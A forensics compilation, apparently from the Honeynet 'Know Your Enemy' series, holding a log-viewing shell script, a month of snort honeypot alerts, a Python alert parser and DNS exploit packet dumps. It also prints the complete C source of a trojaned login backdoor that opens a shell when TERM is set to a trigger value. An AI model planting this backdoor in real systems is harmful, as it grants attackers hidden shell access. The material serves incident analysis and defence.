      
      EoF
      
      korn shell:
      ~~~~~~~~~~
      #!/bin/ksh
      #
      # Created 20 April, 1999
      # Lance Spitzner, lance@spitzner.net
      #
      # Shows last 10 entries of critical system logs.
      # Build in some "artificial intelligence" using
      # greps and sorts.  You can select a specific
      # hosts logs, or you can select all hosts logs.
      #
      
      ##### Define input
      if [ "$1" = "all" ]; then
              system=":"
      else
              system=$1
      fi
      
      log=$2
      
      ##### Define logs
      inetdlog=/var/adm/inetdlog
      messages=/var/adm/messages
      syslog=/var/adm/syslog
      
      ##### Functions
      inetdlog () {
      echo  "\n\t--- Last 10 entries in $inetdlog ---\n"
      grep "$system" "$inetdlog" | grep -v "172.16.1." | tail -10
      }
      
      messages () {
      echo  "\n\t--- Last 10 entries in $messages ---\n"
      grep "$system" "$messages" | egrep -v '(named|MARK)' | tail -10
      }
      
      syslog () {
      echo  "\n\t--- Last 10 entries in $syslog ---\n"
      grep "$system" "$syslog" | tail -10
      }
      
      title () {
      if [ "$system" = ":" ]; then
              echo  "\n### These are the log results of all systems ###"
      else
              echo  "\n### These are the log results of system $system ###"
      fi
      }
      
      ##### Actual program
      case $log in
              inetdlog)
              title
              inetdlog
              ;;
              messages)
              title
              messages
              ;;
              syslog)
              title
              syslog
              ;;
              all)
              title
              inetdlog
              messages
              syslog
              ;;
              *)
              echo  "\nUsage: `basename $0` <host> <log>"
              echo
              echo "\t<host> "
              echo "\tCan either be a single source you want to grep"
              echo "\tfor in the log, or type \"all\" for all hosts in the" 
              echo "\tlog file."
              echo
              echo "\t<log>"
              echo "\tinetdlog  -> for /var/adm/inetdlog"
              echo "\tmessages  -> for /var/adm/messages"
              echo "\tsyslog    -> for /var/adm/syslog"
              echo "\tall       -> for all three log files\n"
      ;;
      esac
      
      exit 0
      
      
      honeypot activity logs : Know your enemy #3 : Forensics
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      #
      # All the probes my network received in a single month.
      # Starting 15 April, 2000
      #
      # You can lookup the IDS number signatures at
      # Max Vision's ArachNIDs database at 
      # http://www.whitehats.com
      #
      # Signatures captured using snort
      # http://www.snort.org
      #
      
      Apr 15 13:40:41 mozart snort[7002]: IDS212/dns-zone-transfer: 207.239.115.11:2307 -> 172.16.1.101:53
      Apr 16 02:45:37 mozart snort[7483]: IDS13/portmap-request-mountd: 200.190.13.181:1372 -> 172.16.1.107:111
      Apr 16 07:17:06 mozart snort[7483]: IDS128/web-cgi-phf: 200.190.8.220:55220 -> 172.16.1.107:80
      Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.101
      Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.105
      Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.107
      Apr 17 06:02:32 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.101:111
      Apr 17 06:02:32 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.107:111
      Apr 17 09:45:28 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.105:111
      Apr 19 08:00:19 mozart snort[3515]: IDS/DNS-version-query: 212.25.75.196:1723 -> 172.16.1.101:53
      Apr 20 01:26:00 mozart snort[3515]: IDS212/dns-zone-transfer: 24.234.45.60:4075 -> 172.16.1.107:53
      Apr 20 03:49:38 mozart snort[3515]: IDS/DNS-version-query: 216.123.23.5:4349 -> 172.16.1.101:53
      Apr 20 03:49:39 mozart snort[3515]: IDS/DNS-version-query: 216.123.23.5:4350 -> 172.16.1.107:53
      Apr 20 21:48:55 mozart snort[12353]: IDS246/large-icmp: 129.142.224.3 -> 172.16.1.107
      Apr 20 21:48:55 mozart snort[12353]: IDS246/large-icmp: 129.142.224.3 -> 172.16.1.107
      Apr 20 22:46:57 mozart snort[12632]: IDS/RPC-rpcinfo-query: 207.239.115.11:3619 -> 172.16.1.107:111
      Apr 20 22:48:13 mozart snort[12632]: IDS159/Ping Microsoft Windows: 216.228.4.204 -> 172.16.1.101
      Apr 20 22:46:57 mozart snort[12632]: IDS/RPC-rpcinfo-query: 207.239.115.11:3619 -> 172.16.1.107:111
      Apr 20 22:48:13 mozart snort[12632]: IDS159/Ping Microsoft Windows: 216.228.4.204 -> 172.16.1.101
      Apr 20 23:00:33 mozart snort[12657]: IDS171/Ping zeros: 216.228.4.133 -> 172.16.1.101
      Apr 21 11:01:27 mozart snort[12777]: IDS/DNS-version-query: 207.236.55.76:4039 -> 172.16.1.101:53
      Apr 21 11:01:28 mozart snort[12777]: IDS/DNS-version-query: 207.236.55.76:4044 -> 172.16.1.107:53
      Apr 22 08:36:29 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:1368 -> 172.16.1.101:53
      Apr 22 08:36:29 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:1328 -> 172.16.1.107:53
      Apr 22 10:00:23 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:4401 -> 172.16.1.101:53
      Apr 22 10:00:23 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:4369 -> 172.16.1.107:53
      Apr 22 11:31:58 mozart snort[743]: IDS/RPC-rpcinfo-query: 213.1.152.141:728 -> 172.16.1.101:111
      Apr 23 01:33:51 mozart snort[3919]: IDS128/web-cgi-phf: 12.68.183.51:4310 -> 172.16.1.107:80
      Apr 23 01:33:56 mozart snort[3919]: IDS218/web-cgi-test-cgi: 12.68.183.51:4312 -> 172.16.1.107:80
      Apr 23 01:34:01 mozart snort[3919]: IDS235/web-cgi-handler: 12.68.183.51:4314 -> 172.16.1.107:80
      Apr 23 01:34:20 mozart snort[3919]: IDS219/web-cgi-perl-exe: 12.68.183.51:4321 -> 172.16.1.107:80
      Apr 23 01:34:36 mozart snort[3919]: IDS224/web-cgi-nph-test-cgi: 12.68.183.51:4328 -> 172.16.1.107:80
      Apr 23 21:01:18 mozart snort[3919]: spp_portscan: PORTSCAN DETECTED from 210.178.9.125
      Apr 23 21:01:25 mozart snort[3919]: IDS/RPC-rpcinfo-query: 210.178.9.125:850 -> 172.16.1.101:111
      Apr 24 07:09:47 mozart snort[4663]: IDS212/dns-zone-transfer: 210.145.109.162:12540 -> 172.16.1.107:53
      Apr 24 09:23:01 mozart snort[4663]: IDS7/SourcePortTraffic-53-tcp: 202.42.233.186:53 -> 172.16.1.107:111
      Apr 24 09:23:01 mozart snort[4663]: IDS7/SourcePortTraffic-53-tcp: 202.42.233.186:53 -> 172.16.1.101:111
      Apr 24 09:23:05 mozart snort[4663]: IDS/RPC-rpcinfo-query: 202.42.233.186:637 -> 172.16.1.107:111
      Apr 24 09:23:10 mozart snort[4663]: IDS/RPC-rpcinfo-query: 202.42.233.186:638 -> 172.16.1.101:111
      Apr 24 14:36:55 mozart snort[4663]: IDS162/Ping Nmap 2.36BETA: 194.222.156.169 -> 172.16.1.105
      Apr 24 14:43:35 mozart snort[4663]: IDS162/Ping Nmap 2.36BETA: 194.222.156.169 -> 172.16.1.101
      Apr 24 14:46:46 mozart snort[4663]: spp_portscan: PORTSCAN DETECTED from 194.222.156.169
      Apr 24 14:46:46 mozart snort[4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
      Apr 24 17:59:51 mozart snort[4663]: IDS/DNS-version-query: 212.244.97.121:2891 -> 172.16.1.101:53
      Apr 24 18:01:05 mozart snort[4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
      Apr 24 19:04:01 mozart snort[4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
      Apr 25 02:08:07 mozart snort[5875]: IDS/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
      Apr 25 02:08:07 mozart snort[5875]: IDS/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
      Apr 25 02:38:17 mozart snort[5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
      Apr 25 08:02:41 mozart snort[5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
      Apr 25 08:02:41 mozart snort[5875]: IDS/DNS-version-query: 24.9.255.53:2991 -> 172.16.1.101:53
      Apr 25 19:37:32 mozart snort[5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
      Apr 26 05:45:12 mozart snort[6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
      Apr 26 06:43:05 mozart snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
      Apr 26 06:45:34 mozart snort[6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
      Apr 26 06:52:10 mozart snort[6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558
      Apr 26 10:39:12 mozart snort[621]: spp_portscan: PORTSCAN DETECTED from 204.72.244.72
      Apr 26 10:39:12 mozart snort[621]: IDS198/SYN FIN Scan: 204.72.244.72:53 -> 172.16.1.101:53
      Apr 26 10:39:12 mozart snort[621]: IDS198/SYN FIN Scan: 204.72.244.72:53 -> 172.16.1.107:53
      Apr 26 17:11:07 mozart snort[621]: IDS128/web-cgi-phf: 207.239.115.11:3536 -> 172.16.1.105:80
      Apr 26 17:11:17 mozart snort[621]: IDS/DNS-version-query: 207.239.115.11:4727 -> 172.16.1.105:53
      Apr 29 21:05:06 mozart snort[5358]: spp_portscan: PORTSCAN DETECTED from 212.109.2.136
      Apr 29 21:05:06 mozart snort[5358]: IDS198/SYN FIN Scan: 212.109.2.136:1080 -> 172.16.1.105:1080
      Apr 30 02:06:37 mozart snort[5750]: spp_portscan: PORTSCAN DETECTED from 202.185.32.60
      Apr 30 02:06:37 mozart snort[5750]: IDS198/SYN FIN Scan: 202.185.32.60:0 -> 172.16.1.101:143
      May 1 04:03:40 mozart snort[6038]: spp_portscan: PORTSCAN DETECTED from 63.203.1.60
      May 1 04:03:47 mozart snort[6038]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 63.203.1.60:3083
      May 1 04:03:47 mozart snort[6038]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 63.203.1.60:3215
      May 1 06:36:53 mozart snort[6038]: IDS212/dns-zone-transfer: 63.203.1.60:1089 -> 172.16.1.101:53
      May 2 16:28:05 mozart snort[6443]: IDS/DNS-version-query: 207.229.143.40:1708 -> 172.16.1.101:53
      May 2 16:28:40 mozart snort[6443]: IDS/DNS-version-query: 207.229.143.40:1715 -> 172.16.1.101:53
      May 2 17:01:43 mozart snort[6443]: IDS/DNS-version-query: 24.114.97.247:3429 -> 172.16.1.101:53
      May 3 19:17:53 mozart snort[6862]: spp_portscan: PORTSCAN DETECTED from 205.242.148.1
      May 3 19:17:53 mozart snort[6862]: IDS198/SYN FIN Scan: 205.242.148.1:0 -> 172.16.1.101:109
      May 3 20:34:15 mozart snort[6862]: IDS/RPC-rpcinfo-query: 200.241.69.1:3697 -> 172.16.1.101:111
      May 3 23:33:55 mozart snort[6862]: spp_portscan: PORTSCAN DETECTED from 210.97.123.3
      May 3 23:33:55 mozart snort[6862]: IDS198/SYN FIN Scan: 210.97.123.3:0 -> 172.16.1.105:109
      May 4 04:59:35 mozart snort[7541]: spp_portscan: PORTSCAN DETECTED from 205.242.148.1
      May 4 04:59:35 mozart snort[7541]: IDS198/SYN FIN Scan: 205.242.148.1:0 -> 172.16.1.101:109
      May 4 15:32:17 mozart snort[7541]: IDS/DNS-version-query: 63.224.195.25:2293 -> 172.16.1.101:53
      May 4 19:14:34 mozart snort[7541]: IDS/DNS-version-query: 12.10.173.249:3434 -> 172.16.1.101:53
      May 5 06:06:52 mozart snort[8324]: IDS212/dns-zone-transfer: 211.38.95.197:2262 -> 172.16.1.101:53
      May 5 08:35:48 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:953 -> 172.16.1.101:111
      May 5 08:35:49 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:955 -> 172.16.1.101:111
      May 5 08:35:53 mozart snort[8324]: IDS20/portmap-request-sadmind: 139.130.213.4:901 -> 172.16.1.101:111
      May 5 08:35:54 mozart snort[8324]: IDS247/large-udp: 139.130.213.4:902 -> 172.16.1.101:32773
      May 5 08:36:53 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:954 -> 172.16.1.101:111
      May 5 08:36:53 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:956 -> 172.16.1.101:111
      May 5 16:04:21 mozart snort[8324]: IDS/RPC-rpcinfo-query: 195.117.3.58:970 -> 172.16.1.101:111
      May 5 17:04:28 mozart snort[8324]: spp_portscan: PORTSCAN DETECTED from 212.109.2.136
      May 5 17:04:28 mozart snort[8324]: IDS198/SYN FIN Scan: 212.109.2.136:109 -> 172.16.1.107:109
      May 5 17:04:28 mozart snort[8324]: IDS198/SYN FIN Scan: 212.109.2.136:109 -> 172.16.1.101:109
      May 5 17:42:24 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:2277 -> 172.16.1.101:53
      May 5 17:46:28 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1831 -> 172.16.1.101:53
      May 5 17:52:58 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1482 -> 172.16.1.101:53
      May 5 17:58:16 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:3310 -> 172.16.1.101:53
      May 5 20:29:05 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1723 -> 172.16.1.101:53
      May 5 20:32:01 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:3132 -> 172.16.1.101:53
      May 6 08:54:09 victim1.honeynet.org named[4991]: unapproved AXFR from [212.72.63.240].4429 for UICMBA.edu (not master/slave)
      May 6 19:44:52 victim1.honeynet.org named[4991]: unapproved AXFR from [211.39.95.226].4958 for UICMBA.edu (not master/slave)
      May 7 19:22:22 victim1.honeynet.org named[4991]: unapproved AXFR from [216.190.204.3].1866 for UICMBA.edu (not master/slave)
      May 8 12:42:05 victim1.honeynet.org named[4991]: unapproved AXFR from [203.75.204.245].4542 for UICMBA.edu (not master/slave)
      May 8 21:53:03 lisa snort[387]: IDS118/Traceroute ICMP: 24.21.107.249 -> 172.16.1.104
      May 8 21:58:40 lisa snort[387]: IDS162/Ping Nmap 2.36BETA: 24.21.107.249 -> 172.16.1.104
      May 8 21:58:41 lisa snort[387]: spp_portscan: PORTSCAN DETECTED from 24.21.107.249
      May 8 21:59:06 lisa snort[387]: IDS162/Ping Nmap 2.36BETA: 24.21.107.249 -> 172.16.1.104
      May 8 22:16:06 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.81:34536 -> 172.16.1.104:33457
      May 8 22:16:45 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.80:34546 -> 172.16.1.104:33446
      May 8 22:17:35 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.81:34561 -> 172.16.1.104:33457
      May 9 08:02:54 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 216.61.43.89
      May 9 08:21:02 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 204.2.13.22
      May 9 09:39:28 lisa snort[2370]: IDS212/dns-zone-transfer: 206.133.123.19:2421 -> 172.16.1.101:53
      May 9 11:03:20 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2984 -> 172.16.1.107:27444
      May 9 11:03:20 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1025 -> 137.132.17.202:31335
      May 9 11:26:04 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2988 -> 172.16.1.107:27444
      May 9 11:26:04 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1027 -> 137.132.17.202:31335
      May 9 14:04:55 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 206.133.123.19
      May 9 14:04:57 lisa snort[2370]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 206.133.123.19:1720
      May 9 14:04:58 lisa snort[2370]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 206.133.123.19:1741
      May 9 14:05:08 lisa snort[2370]: IDS128/web-cgi-phf: 206.133.123.19:1815 -> 172.16.1.107:80
      May 9 14:05:09 lisa snort[2370]: IDS218/web-cgi-test-cgi: 206.133.123.19:1820 -> 172.16.1.107:80
      May 9 14:05:09 lisa snort[2370]: IDS235/web-cgi-handler: 206.133.123.19:1824 -> 172.16.1.107:80
      May 9 20:48:14 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:3076 -> 172.16.1.107:27444
      May 9 20:48:14 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1028 -> 137.132.17.202:31335
      
      EoF
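
      Added example (not part of the original log or of the Honeynet paper): a Python parser for the record shapes in the log above (snort alerts with and without ports, spp_portscan notices, named's AXFR refusals) that lists remote addresses whose reconnaissance alert was later followed by a different kind of alert. The sample lines are copied from the log; the 172.16.1.0/24 range, the year and the recon keyword list are assumptions of this example.

```python
import ipaddress
import re
from collections import defaultdict
from datetime import datetime

# Lines copied verbatim from the log above, covering each record shape.
SAMPLE_LOG = """\
Apr 20 21:48:55 mozart snort[12353]: IDS246/large-icmp: 129.142.224.3 -> 172.16.1.107
Apr 24 14:36:55 mozart snort[4663]: IDS162/Ping Nmap 2.36BETA: 194.222.156.169 -> 172.16.1.105
Apr 24 14:46:46 mozart snort[4663]: spp_portscan: PORTSCAN DETECTED from 194.222.156.169
Apr 24 14:46:46 mozart snort[4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 19:04:01 mozart snort[4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 02:08:07 mozart snort[5875]: IDS/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 26 06:43:05 mozart snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:52:10 mozart snort[6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558
May 6 08:54:09 victim1.honeynet.org named[4991]: unapproved AXFR from [212.72.63.240].4429 for UICMBA.edu (not master/slave)
May 9 11:03:20 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2984 -> 172.16.1.107:27444
May 9 11:03:20 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1025 -> 137.132.17.202:31335
"""

HONEYNET = ipaddress.ip_network("172.16.1.0/24")  # assumption: inferred from the local addresses
YEAR = 2000                                       # syslog omits the year; the header gives it
MONTHS = {m: i for i, m in enumerate(
    "Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(), 1)}

SYSLOG = re.compile(r"^(\w{3})\s+(\d{1,2})\s+(\d\d):(\d\d):(\d\d)\s+(\S+)\s+\w+\[\d+\]:\s+(.*)$")
ALERT = re.compile(r"^(?P<sig>.+?): (?P<src>[\d.]+)(?::(?P<sport>\d+))? -> "
                   r"(?P<dst>[\d.]+)(?::(?P<dport>\d+))?$")
PORTSCAN = re.compile(r"^(?P<sig>spp_portscan): PORTSCAN DETECTED from (?P<src>[\d.]+)$")
AXFR = re.compile(r"^unapproved AXFR from \[(?P<src>[\d.]+)\]\.(?P<sport>\d+) for \S+")
# Assumption of this example: signature names containing these words are reconnaissance.
RECON = re.compile(r"query|scan|ping|traceroute|probe|zone-transfer|axfr", re.I)


def parse_line(line, year=YEAR):
    """Return one event dict, or None if the line is not a recognised record."""
    m = SYSLOG.match(line.strip())
    if not m:
        return None
    mon, day, hh, mm, ss, sensor, msg = m.groups()
    when = datetime(year, MONTHS[mon], int(day), int(hh), int(mm), int(ss))
    for pattern in (ALERT, PORTSCAN, AXFR):
        hit = pattern.match(msg)
        if hit:
            break
    else:
        return None
    f = hit.groupdict()
    sig = f.get("sig") or "named/unapproved-AXFR"  # label made up here for named's message
    src, dst = f["src"], f.get("dst")
    # The remote party is the endpoint outside the monitored range; replies from
    # a honeypot (telnet banner, trin00 pong) carry it as the destination.
    outbound = dst is not None and ipaddress.ip_address(src) in HONEYNET
    remote, local = (dst, src) if outbound else (src, dst)
    return {"time": when, "sensor": sensor, "sig": sig, "remote": remote, "local": local}


def parse_log(text):
    """Parse every recognised line and return the events in time order."""
    events = [e for e in map(parse_line, text.splitlines()) if e]
    return sorted(events, key=lambda e: e["time"])


def escalations(events):
    """Map each remote address to the non-recon signatures it triggered
    after its first reconnaissance alert."""
    first_recon = {}
    result = defaultdict(list)
    for e in events:  # already in time order
        remote, sig = e["remote"], e["sig"]
        if RECON.search(sig):
            first_recon.setdefault(remote, e["time"])
        elif remote in first_recon and e["time"] > first_recon[remote]:
            if sig not in result[remote]:
                result[remote].append(sig)
    return dict(result)


if __name__ == "__main__":
    for remote, sigs in escalations(parse_log(SAMPLE_LOG)).items():
        print(remote, "->", ", ".join(sigs))
```

      In these sample lines the second address reported is 63.226.81.13: a DNS version query on Apr 25, then the nops-x86 alert of Apr 26 06:43:05.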
      
      the backdoor code bj.c Know your enemy #3: Forensics
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
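      #define _XOPEN_SOURCE
      #include <unistd.h>
      #include <stdio.h>
      #include <signal.h>
      #include <sys/time.h>
      #include <string.h>
      #define SHELL "/bin/sh"           /* exec'd when the trigger matches */
      #define SHELL_CALLME "login"      /* argv[0] given to that shell */
      #define LOGIN "/usr/bin/xstat"    /* exec'd for every other caller */
      #define LOGIN_CALLME "login"
      #define ENV_NAME "TERM"           /* environment variable inspected */
      #define ENV_VALUE "vt9111"        /* value that acts as the trigger */
      #define ENV_FIX "r!!t!d"          /* value written back over the trigger */

      int owned(void);
      char **av, **ep;

      int main(int argc, char **argv, char **envp) {
              av=argv;
              ep=envp;
              av[0]=SHELL_CALLME;

              /* Trigger present: exec SHELL instead of the login program. */
              if (owned()) {
                      char *sav[]={ SHELL_CALLME, NULL };
                      execve(SHELL, sav, ep);
                      return 0;
              }

              /* Otherwise pass the original arguments through to LOGIN. */
              execve(LOGIN, av, ep);
              return 0;
      }

      /* Returns 1 if an entry whose name starts with ENV_NAME has a value that
         starts with ENV_VALUE, after replacing that entry with ENV_NAME=ENV_FIX.
         strtok() overwrites the '=' of every entry it scans, so those entries
         reach execve() cut off at the bare name. */
      int owned(void) {
              char *name, *value;
              int i;

              for (i=0; ep[i]!=NULL; ++i) {
                      name=strtok(ep[i], "=");
                      value=strtok(NULL, "=");
                      if (name==NULL || value==NULL) continue;
                      if (!strncmp(name, ENV_NAME, strlen(ENV_NAME))) {
                              if (!strncmp(value, ENV_VALUE, strlen(ENV_VALUE))) {
                                      char tmp[100];
                                      sprintf(tmp, "%s=%s", ENV_NAME, ENV_FIX);
                                      ep[i]=strdup(tmp);
                                      return 1;
                              }
                      }
              }

              return 0;
      }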
      
      
      EoF
      
      detailed forensic analysis of an attack Know your enemy #3 : Forensics
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
        
      --- COMMENT: The Tickle --- 
      
      What you are looking at below are the decoded packets of the exploit.  For this particular DNS exploit to work, the DNS victim must be recursive (as I soon learned).  So, our black-hat has to
      determine that our victim DNS server is recursive.  He first tests this by querying the DNS server to resolve 107.71.80.216.in-addr.arpa.  If successful, he will then know our DNS server is
      recursive. Below you see the packets of the successful, recursive lookup of 107.71.80.216.in-addr.arpa. 
      
      04/26-06:42:59.473423 213.28.22.189:1045 -> 172.16.1.107:53 
      UDP TTL:40 TOS:0x0 ID:18856 
      Len: 52 
      95 6A 01 00 00 01 00 00 00 00 00 00 03 31 30 37  .j...........107 
      02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad 
      64 72 04 61 72 70 61 00 00 0C 00 01              dr.arpa..... 
      
      04/26-06:42:59.474405 172.16.1.107:1028 -> 128.8.10.90:53 
      UDP TTL:64 TOS:0x0 ID:18861 
      Len: 52 
      5C 21 01 00 00 01 00 00 00 00 00 00 03 31 30 37  \!...........107 
      02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad 
      64 72 04 61 72 70 61 00 00 0C 00 01              dr.arpa..... 
      
      04/26-06:42:59.574808 128.8.10.90:53 -> 172.16.1.107:1028 
      UDP TTL:48 TOS:0x0 ID:5077 
      Len: 135 
      5C 21 81 00 00 01 00 00 00 02 00 00 03 31 30 37  \!...........107 
      02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad 
      64 72 04 61 72 70 61 00 00 0C 00 01 02 37 31 02  dr.arpa......71. 
      38 30 03 32 31 36 07 49 4E 2D 41 44 44 52 04 61  80.216.IN-ADDR.a 
      72 70 61 00 00 02 00 01 00 07 E9 00 00 12 03 4E  rpa............N 
      53 30 08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00  S0.ENTERACT.COM. 
      C0 2C 00 02 00 01 00 07 E9 00 00 13 07 42 49 46  .,...........BIF 
      52 4F 53 54 08 53 45 41 53 54 52 4F 4D C0 5B     ROST.SEASTROM.[ 
      
      04/26-06:42:59.576169 172.16.1.107:1028 -> 198.32.64.12:53 
      UDP TTL:64 TOS:0x0 ID:18862 
      Len: 46 
      87 2A 00 00 00 01 00 00 00 00 00 00 07 42 49 46  .*...........BIF 
      52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F  ROST.SEASTROM.CO 
      4D 00 00 01 00 01                                M..... 
      
      04/26-06:42:59.576953 172.16.1.107:1028 -> 198.32.64.12:53 
      UDP TTL:64 TOS:0x0 ID:18863 
      Len: 42 
      DA 57 00 00 00 01 00 00 00 00 00 00 03 4E 53 30  .W...........NS0 
      08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01  .ENTERACT.COM... 
      00 01                                            .. 
      
      04/26-06:43:00.215765 198.32.64.12:53 -> 172.16.1.107:1028 
      UDP TTL:51 TOS:0x0 ID:42900 
      Len: 462 
      87 2A 80 00 00 01 00 00 00 0C 00 0C 07 42 49 46  .*...........BIF 
      52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F  ROST.SEASTROM.CO 
      4D 00 00 01 00 01 03 43 4F 4D 00 00 02 00 01 00  M......COM...... 
      07 E9 00 00 14 01 41 0C 52 4F 4F 54 2D 53 45 52  ......A.ROOT-SER 
      56 45 52 53 03 4E 45 54 00 C0 26 00 02 00 01 00  VERS.NET..&..... 
      07 E9 00 00 04 01 47 C0 37 C0 26 00 02 00 01 00  ......G.7.&..... 
      07 E9 00 00 11 01 46 0C 47 54 4C 44 2D 53 45 52  ......F.GTLD-SER 
      56 45 52 53 C0 44 C0 26 00 02 00 01 00 07 E9 00  VERS.D.&........ 
      00 04 01 46 C0 37 C0 26 00 02 00 01 00 07 E9 00  ...F.7.&........ 
      00 04 01 49 C0 37 C0 26 00 02 00 01 00 07 E9 00  ...I.7.&........ 
      00 04 01 45 C0 37 C0 26 00 02 00 01 00 07 E9 00  ...E.7.&........ 
      00 04 01 4A C0 67 C0 26 00 02 00 01 00 07 E9 00  ...J.g.&........ 
      00 04 01 4B C0 67 C0 26 00 02 00 01 00 07 E9 00  ...K.g.&........ 
      00 04 01 41 C0 67 C0 26 00 02 00 01 00 07 E9 00  ...A.g.&........ 
      00 04 01 4D C0 67 C0 26 00 02 00 01 00 07 E9 00  ...M.g.&........ 
      00 04 01 48 C0 67 C0 26 00 02 00 01 00 07 E9 00  ...H.g.&........ 
      00 04 01 43 C0 67 C0 35 00 01 00 01 00 36 EE 80  ...C.g.5.....6.. 
      00 04 C6 29 00 04 C0 55 00 01 00 01 00 36 EE 80  ...)...U.....6.. 
      00 04 C0 70 24 04 C0 65 00 01 00 01 00 07 E9 00  ...p$..e........ 
      00 04 C6 11 D0 43 C0 82 00 01 00 01 00 36 EE 80  .....C.......6.. 
      00 04 C0 05 05 F1 C0 92 00 01 00 01 00 36 EE 80  .............6.. 
      00 04 C0 24 94 11 C0 A2 00 01 00 01 00 36 EE 80  ...$.........6.. 
      00 04 C0 CB E6 0A C0 B2 00 01 00 01 00 07 E9 00  ................ 
      00 04 C6 29 00 15 C0 C2 00 01 00 01 00 07 E9 00  ...)............ 
      00 04 C3 08 63 0B C0 D2 00 01 00 01 00 07 E9 00  ....c........... 
      00 04 C6 29 03 26 C0 E2 00 01 00 01 00 07 E9 00  ...).&.......... 
      00 04 D2 B0 98 12 C0 F2 00 01 00 01 00 07 E9 00  ................ 
      00 04 D8 21 4B 52 C1 02 00 01 00 01 00 07 E9 00  ...!KR.......... 
      00 04 CD BC B9 12                                ...... 
      
      04/26-06:43:00.218808 172.16.1.107:1028 -> 205.188.185.18:53 
      UDP TTL:64 TOS:0x0 ID:18864 
      Len: 46 
      E6 38 00 00 00 01 00 00 00 00 00 00 07 42 49 46  .8...........BIF 
      52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F  ROST.SEASTROM.CO 
      4D 00 00 01 00 01                                M..... 
      
      04/26-06:43:00.220217 198.32.64.12:53 -> 172.16.1.107:1028 
      UDP TTL:51 TOS:0x0 ID:42903 
      Len: 458 
      DA 57 80 00 00 01 00 00 00 0C 00 0C 03 4E 53 30  .W...........NS0 
      08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01  .ENTERACT.COM... 
      00 01 03 43 4F 4D 00 00 02 00 01 00 07 E9 00 00  ...COM.......... 
